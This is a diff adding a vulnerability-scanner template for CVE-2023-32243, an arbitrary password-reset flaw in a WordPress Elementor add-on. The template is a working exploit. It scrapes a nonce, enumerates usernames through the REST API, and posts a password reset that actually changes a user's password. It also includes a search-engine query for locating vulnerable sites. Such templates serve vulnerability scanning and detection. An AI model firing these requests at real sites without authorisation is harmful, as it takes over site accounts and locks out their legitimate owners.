diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml new file mode 100644 index 0000000000..0ae9ce4ac8 --- /dev/null +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -0,0 +1,77 @@ +id: CVE-2023-32243 + +info: + name: WordPress Elementor Lite 5.7.1 Arbitrary Password Reset + author: DhiyaneshDK + severity: critical + description: | + Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-32243 + - https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites?_s_id=cve + - https://github.com/RandomRobbieBF/CVE-2023-32243/blob/main/exploit.py + - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-32243 + cwe-id: CWE-287 + metadata: + max-request: 3 + google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite + verified: "true" + tags: wpscan,cve2023,wordpress,wp-plugin,auth-bypass + +variables: + password1: "{{randstr}}" + password2: "{{randstr}}" + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-json/wp/v2/users/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin-ajax.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 + + action=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password1}}&eael-pass2={{password2}}&rp_login={{wordpress-username}} + + host-redirects: true + max-redirects: 2 + + extractors: + - type: regex + name: nonce + part: body_1 + group: 1 + regex: + - 'nonce":"([0-9a-z]+)' + internal: true + + - type: json + part: body_2 + name: wordpress-username + group: 1 + json: + - '.[] | .slug' + - '.[].name' + internal: true + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - '"success":true' + - '"data":' + condition: and